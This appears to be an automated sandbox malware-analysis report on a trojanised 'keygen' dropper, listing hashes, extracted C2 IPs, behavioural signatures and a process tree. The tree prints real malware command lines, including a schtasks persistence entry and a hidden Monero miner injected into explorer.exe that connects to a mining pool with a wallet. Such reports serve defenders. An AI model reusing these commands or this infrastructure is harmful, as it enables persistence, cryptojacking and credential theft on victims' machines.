Overview
overview
10Static
static
10keygen-pr.exe
windows7-x64
3keygen-pr.exe
windows10-2004-x64
3keygen-step-1.exe
windows7-x64
10keygen-step-1.exe
windows10-2004-x64
10keygen-step-3.exe
windows7-x64
7keygen-step-3.exe
windows10-2004-x64
7keygen-step-4.exe
windows7-x64
10keygen-step-4.exe
windows10-2004-x64
10keygen-step-6.exe
windows7-x64
7keygen-step-6.exe
windows10-2004-x64
7keygen.bat
windows7-x64
10keygen.bat
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-11-2024 22:25
Behavioral task
behavioral1
Sample
keygen-pr.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
keygen-pr.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
keygen-step-1.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
keygen-step-1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
keygen-step-3.exe
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
keygen-step-3.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
keygen-step-4.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
keygen-step-4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
keygen-step-6.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
keygen-step-6.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
keygen.bat
Resource
win7-20240903-en
General
-
Target
keygen-step-4.exe
-
Size
3.4MB
-
MD5
6fc4f2d665aa1aae0a56ebd4cc6227a7
-
SHA1
1b998ceba86cd9b87dbbf464fca3008bc5c725ea
-
SHA256
77acd936a5bd8eb9ae70ca4ac75e5159df48324273baae60854b6fbc412d36d7
-
SHA512
67048ad418bd35e30671b76951f149e81be58d94e6cbcff4cdc01f19b3bf0ca64103c59451efbf5e519e95a9a126df561ff559f7ee4cc263bfc501e6d0fa5f4e
-
SSDEEP
98304:SKqyUiTtG/saMpSQwnQXl8LSZ8Z56DXXuDUVJqDI6AHZQTg9:S8usaMpuQXl8LSk5mX4iJBfQs9
Malware Config
Extracted
ffdroider
http://186.2.171.3
Extracted
gcleaner
194.145.227.161
Signatures
-
Detect Fabookie payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jhuuee.exe family_fabookie -
FFDroider payload 2 IoCs
Processes:
resource yara_rule behavioral8/memory/3496-103-0x0000000000400000-0x0000000000667000-memory.dmp family_ffdroider behavioral8/memory/3496-622-0x0000000000400000-0x0000000000667000-memory.dmp family_ffdroider -
Fabookie family
-
Ffdroider family
-
Gcleaner family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
OnlyLogger payload 1 IoCs
Processes:
resource yara_rule behavioral8/memory/4580-102-0x0000000000400000-0x0000000002B59000-memory.dmp family_onlylogger -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
services64.exekeygen-step-4.exeCrack.exePBrowFile28.exechrome3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation services64.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation keygen-step-4.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Crack.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation PBrowFile28.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation chrome3.exe -
Executes dropped EXE 14 IoCs
Processes:
Crack.exeCrack.exePBrowFile28.exechrome3.exePublicDwlBrowser188.exe2.exesetup.exejhuuee.exemd1_1eaf.exeservices64.exef2217e5f.exess.exeSetup.exesihost64.exepid process 1156 Crack.exe 4264 Crack.exe 840 PBrowFile28.exe 3968 chrome3.exe 1524 PublicDwlBrowser188.exe 2912 2.exe 4580 setup.exe 664 jhuuee.exe 3496 md1_1eaf.exe 4312 services64.exe 5016 f2217e5f.exe 4328 ss.exe 4808 Setup.exe 1216 sihost64.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
md1_1eaf.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md1_1eaf.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
Processes:
flow ioc 104 raw.githubusercontent.com 105 raw.githubusercontent.com 112 pastebin.com 113 pastebin.com 125 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 4312 set thread context of 3864 4312 services64.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3188 4580 WerFault.exe setup.exe 4912 4580 WerFault.exe setup.exe 4368 4580 WerFault.exe setup.exe 3520 4580 WerFault.exe setup.exe 2520 4580 WerFault.exe setup.exe 3336 4580 WerFault.exe setup.exe 756 4580 WerFault.exe setup.exe 2356 5016 WerFault.exe f2217e5f.exe 2484 4580 WerFault.exe setup.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
setup.exemd1_1eaf.exef2217e5f.exeSetup.exekeygen-step-4.exeCrack.exePBrowFile28.exeCrack.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language md1_1eaf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2217e5f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language keygen-step-4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PBrowFile28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crack.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
f2217e5f.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f2217e5f.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f2217e5f.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f2217e5f.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4788 schtasks.exe 1388 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 58 IoCs
Processes:
chrome3.exeservices64.exeexplorer.exepid process 3968 chrome3.exe 3968 chrome3.exe 4312 services64.exe 4312 services64.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
2.exePublicDwlBrowser188.exechrome3.exemd1_1eaf.exess.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2912 2.exe Token: SeDebugPrivilege 1524 PublicDwlBrowser188.exe Token: SeDebugPrivilege 3968 chrome3.exe Token: SeManageVolumePrivilege 3496 md1_1eaf.exe Token: SeManageVolumePrivilege 3496 md1_1eaf.exe Token: SeManageVolumePrivilege 3496 md1_1eaf.exe Token: SeManageVolumePrivilege 3496 md1_1eaf.exe Token: SeManageVolumePrivilege 3496 md1_1eaf.exe Token: SeDebugPrivilege 4328 ss.exe Token: SeDebugPrivilege 4312 services64.exe Token: SeLockMemoryPrivilege 3864 explorer.exe Token: SeLockMemoryPrivilege 3864 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Setup.exepid process 4808 Setup.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
keygen-step-4.exeCrack.exePBrowFile28.exechrome3.execmd.exeservices64.execmd.exedescription pid process target process PID 4628 wrote to memory of 1156 4628 keygen-step-4.exe Crack.exe PID 4628 wrote to memory of 1156 4628 keygen-step-4.exe Crack.exe PID 4628 wrote to memory of 1156 4628 keygen-step-4.exe Crack.exe PID 1156 wrote to memory of 4264 1156 Crack.exe Crack.exe PID 1156 wrote to memory of 4264 1156 Crack.exe Crack.exe PID 1156 wrote to memory of 4264 1156 Crack.exe Crack.exe PID 4628 wrote to memory of 840 4628 keygen-step-4.exe PBrowFile28.exe PID 4628 wrote to memory of 840 4628 keygen-step-4.exe PBrowFile28.exe PID 4628 wrote to memory of 840 4628 keygen-step-4.exe PBrowFile28.exe PID 840 wrote to memory of 3968 840 PBrowFile28.exe chrome3.exe PID 840 wrote to memory of 3968 840 PBrowFile28.exe chrome3.exe PID 840 wrote to memory of 1524 840 PBrowFile28.exe PublicDwlBrowser188.exe PID 840 wrote to memory of 1524 840 PBrowFile28.exe PublicDwlBrowser188.exe PID 840 wrote to memory of 2912 840 PBrowFile28.exe 2.exe PID 840 wrote to memory of 2912 840 PBrowFile28.exe 2.exe PID 840 wrote to memory of 4580 840 PBrowFile28.exe setup.exe PID 840 wrote to memory of 4580 840 PBrowFile28.exe setup.exe PID 840 wrote to memory of 4580 840 PBrowFile28.exe setup.exe PID 840 wrote to memory of 664 840 PBrowFile28.exe jhuuee.exe PID 840 wrote to memory of 664 840 PBrowFile28.exe jhuuee.exe PID 4628 wrote to memory of 3496 4628 keygen-step-4.exe md1_1eaf.exe PID 4628 wrote to memory of 3496 4628 keygen-step-4.exe md1_1eaf.exe PID 4628 wrote to memory of 3496 4628 keygen-step-4.exe md1_1eaf.exe PID 3968 wrote to memory of 3188 3968 chrome3.exe cmd.exe PID 3968 wrote to memory of 3188 3968 chrome3.exe cmd.exe PID 3188 wrote to memory of 4788 3188 cmd.exe schtasks.exe PID 3188 wrote to memory of 4788 3188 cmd.exe schtasks.exe PID 3968 wrote to memory of 4312 3968 chrome3.exe services64.exe PID 3968 wrote to memory of 4312 3968 chrome3.exe services64.exe PID 4628 wrote to memory of 5016 4628 keygen-step-4.exe f2217e5f.exe PID 4628 wrote to memory of 5016 4628 keygen-step-4.exe f2217e5f.exe PID 4628 wrote to memory of 5016 4628 keygen-step-4.exe f2217e5f.exe PID 4628 wrote to memory of 4328 4628 keygen-step-4.exe ss.exe PID 4628 wrote to memory of 4328 4628 keygen-step-4.exe ss.exe PID 4628 wrote to memory of 4808 4628 keygen-step-4.exe Setup.exe PID 4628 wrote to memory of 4808 4628 keygen-step-4.exe Setup.exe PID 4628 wrote to memory of 4808 4628 keygen-step-4.exe Setup.exe PID 4312 wrote to memory of 2228 4312 services64.exe cmd.exe PID 4312 wrote to memory of 2228 4312 services64.exe cmd.exe PID 4312 wrote to memory of 1216 4312 services64.exe sihost64.exe PID 4312 wrote to memory of 1216 4312 services64.exe sihost64.exe PID 2228 wrote to memory of 1388 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 1388 2228 cmd.exe schtasks.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe PID 4312 wrote to memory of 3864 4312 services64.exe explorer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4264
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:4788
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:1388
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
PID:1216
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 7884⤵
- Program crash
PID:3188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 7964⤵
- Program crash
PID:4912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 8244⤵
- Program crash
PID:4368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 9164⤵
- Program crash
PID:3520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 7044⤵
- Program crash
PID:2520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 11284⤵
- Program crash
PID:3336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 11364⤵
- Program crash
PID:756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 11804⤵
- Program crash
PID:2484
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵
- Executes dropped EXE
PID:664
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3496
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:5016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 3523⤵
- Program crash
PID:2356
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4580 -ip 45801⤵PID:3832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4580 -ip 45801⤵PID:2728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4580 -ip 45801⤵PID:4772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4580 -ip 45801⤵PID:2952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4580 -ip 45801⤵PID:4456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4580 -ip 45801⤵PID:4444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4580 -ip 45801⤵PID:856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5016 -ip 50161⤵PID:408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4580 -ip 45801⤵PID:3256
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5a5bace3c3c2fa1cb766775746a046594
SHA19998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA51266f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184
-
Filesize
101KB
MD513e802bd360e44591d7d23036ce1fd33
SHA1091a58503734848a4716382862526859299ef345
SHA256e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA5128bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b
-
Filesize
56KB
MD57126148bfe5ca4bf7e098d794122a9a3
SHA13fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA5120bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48
-
Filesize
1.8MB
MD58902f8193024fa4187ca1aad97675960
SHA137a4840c9657205544790c437698b54ca33bfd9d
SHA25695de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938
-
Filesize
1.6MB
MD57009fb80a52366b6c2cd8ec052a65791
SHA1db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA51226e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079
-
Filesize
14.0MB
MD574ea2aaecbe5947e33ef38278cfc38ed
SHA1f33ac4d516e60bb98ff82077cccb1480db3e2285
SHA256666aec52b2d7833f2d9cffc19d105cc7971df465f50f724ffc90cf3fdf51707f
SHA5123161e3c53337fa53ba0ec4bcc04b3941a53af437d2cc186293d2e055ca9ab6aadba4dfa892f6aad840e33cf3179642e3c896f61016e3ec0192d04cc40f2d0483
-
Filesize
50KB
MD5d3587b25682e6badd3938bf3105ff1b2
SHA18d94a6e94e2c23c55716ca11545f2d82c1c961f8
SHA256ad65e47dee4ab88cb7c18b404d49b4eefdb5b7e9c10e520cdb2f3a377a82fd68
SHA512b0fe622fac6445bb20c0de78043ece97f370cb92637694c9712dcc47a9d1ed1bd27f87db16f2c9a6970be3af5e31487e06843943f23faa6b0d87d4fba5844cbf
-
Filesize
16KB
MD5be317fcc9f3c0f0909413e3a9c9f7d6b
SHA126c737cf412744c35a1a68bf33324d8522938ef7
SHA25637605b1267507e235ec32827e141f67a0ab901e329abe9091261eaf1c4217f1f
SHA512f1fd7a12a1b3dd67bc66d431e5e8f665d66dc09eb15d51d5b153f7eb2bf640143135363d336295fda0905a327bf14d1ac2f47cf4e67f169a60f455135f7ab1eb
-
Filesize
16KB
MD55385878b74afc82a4c4ef0f1293bb0c0
SHA11ee9cbf3c7a712ed91b2418b7841ecf8cf895927
SHA256fbb4b78aba29fbbbc8153b8d5567bff16d0a4687aee426950b87cd9da1ab22e8
SHA5124a3f40ef3e263026b8d8be4f0cbdd7c3faf90a4a8d95ff07d800db0d7718680ce7015ec3220a54fc97a2b87a54a7c228e3dd5ad7b106b91e1a8f927b508f9fd1
-
Filesize
16KB
MD52a9bafb7a427371e6a9a42a63b4555f1
SHA1f0ece630ee618a71a4ad19fecb8fe0372d94c031
SHA256e6b31cf3e28b73fdb3308bf4b4b9be1fe2c2c564971c6ad38cc113b0ae9a61c8
SHA51265411be8e2a6bc9724bce154f7a6a91589acae7437035b78b3d05b3fed5a511c3501e1457a79a0c1837eff3f0393944ed09f3fa3fa5d7206abc172dc7687032b
-
Filesize
16KB
MD5a2463d5f134fc65cebacb6cc4065d11f
SHA11724c6aba247e87199dc78c7363587f1700b4c2a
SHA25685be9500c7d0094f44eec5a0721e49bbdbafc6b85e83e4185bf47e8974b1f029
SHA5129cd405c8e2c344417084699e91b1c11b1ee17622e553471b2a7cbdd158ec33b5f8f4255f6bfe50e08e5e2209e31cd60642cbb6639b529020b3f6c151a9af6053
-
Filesize
16KB
MD51cb913e62009797ca7788b7a08ecfe53
SHA1da4877fab34ec90b0c9a5ca2a88af48795ead464
SHA25663b93118e6f44a1256f69c4dd111e56b0e002245a02d2b98d511ff5637a8ccff
SHA5129bdfe407150bea45d2e9d17497a51c0829c386f2e2e6bdc462a92f5a5ec2b83d03f2404f1733a3c36393784cd39de2a9ae1ed4cd57a531401b22ccf8631b980e
-
Filesize
16KB
MD53f4680ff1fcaca0e97be23858c27c1d8
SHA1ff59883b3fcd164d722d3015dd5e25c3b77f5f9e
SHA256d79f1df31ba2919229391e60d257abfb154025745d058050e646c5c7b22e2e2c
SHA512754c12e3d994d47d3da1ec7844442dcf35c35f8635e1a731580e83adc0f1b96b44990cd28f6ea942d442a6640383929e50a2445c76143b0718731adc4c8462b0
-
Filesize
16KB
MD5d2c97799642b7ca5bead234e9a93a812
SHA1fc7099e38c1de7d1d57ae314e7c58c3d43b0343b
SHA256d98e4600c97ce9996be45f0b71e8698820e141a59e85ea97d1bd06b58c1c40d4
SHA512a6de5cafae6ac04d24b45bf6d1e9ec5064d3d0e4876610346e7c3bcb5dbfa7133be823086e70a053c22923087ecac927bc6775f0c32d1272e10e6ae36cfd2ca1
-
Filesize
16KB
MD5d6e2f4fbf99c59fd62708d09c13c63d9
SHA11c0bf099eb501443f8c71278ff686fcd060ed702
SHA256af6a8327169475ac9787082e25b71e1359b6be56557b5fafe16796e44e382d94
SHA512269043bc0ba1989fa6d8b6b0cfc2d8179effc52a691ed300b71f962b506b01564f3bf94a66b9cea19bc71684ddfec96a0294284f3696e688cacdb094f1572d95
-
Filesize
16KB
MD54c2caf9e16c30eee4876af875aedf853
SHA11225d85e071953dfa429f54f935c84e4f371992f
SHA2568a5850bb25c30fe3adfc6b64f12af0d42211f6f4e013a4602fed7c566b20fef3
SHA512975455b463c9240ca2849fe29ec94649412a15038b0574bb97609e12a2c4c5206e0768c091082177cb9f52a6bff1ca413c67fac73d522468a0e0475313a3315b
-
Filesize
16KB
MD55dbec7d17ac207e2059ccad5d3c02eb2
SHA172c57279f427d91935399a3816d41dd6d1bf2ffa
SHA2566744af2aed4bedfd36be458fa109072ee6d869e8a433df4669d5f9f5cd68fd4d
SHA5128393f9fd02f4c05f462a297f1b39d82b958d7c22983bdfe9f82bf222fab00402a813fecb10ffa77b93ac2bf1496dfde92c33cd70faad5d9c3bb80c38db72d6ae
-
Filesize
16KB
MD5417481c433d1976baac3d90df7ca8123
SHA1bc432d861c1d78666e2401fe928fc370e8a0df2d
SHA2568e0f43de0070ff21503c21d766c1ebc384d5d404ac6850b70ea5579fe2f58a9b
SHA512c16c91f451344dd600269d4a53e0a018b231b2004bf138aec00e5f117bcbcf0ea3da2eefefc852c749214986f1339303869dc6246f5dedcf3be9547e11272e94
-
Filesize
16KB
MD5fc1fd9ecba65827c81e85f530c55cebd
SHA187aef49227c18edc0662bd30c41fc50f84ef1080
SHA25665760e79099da0c86aa205ca1f084c07555703f03de572cce2042edc8489af18
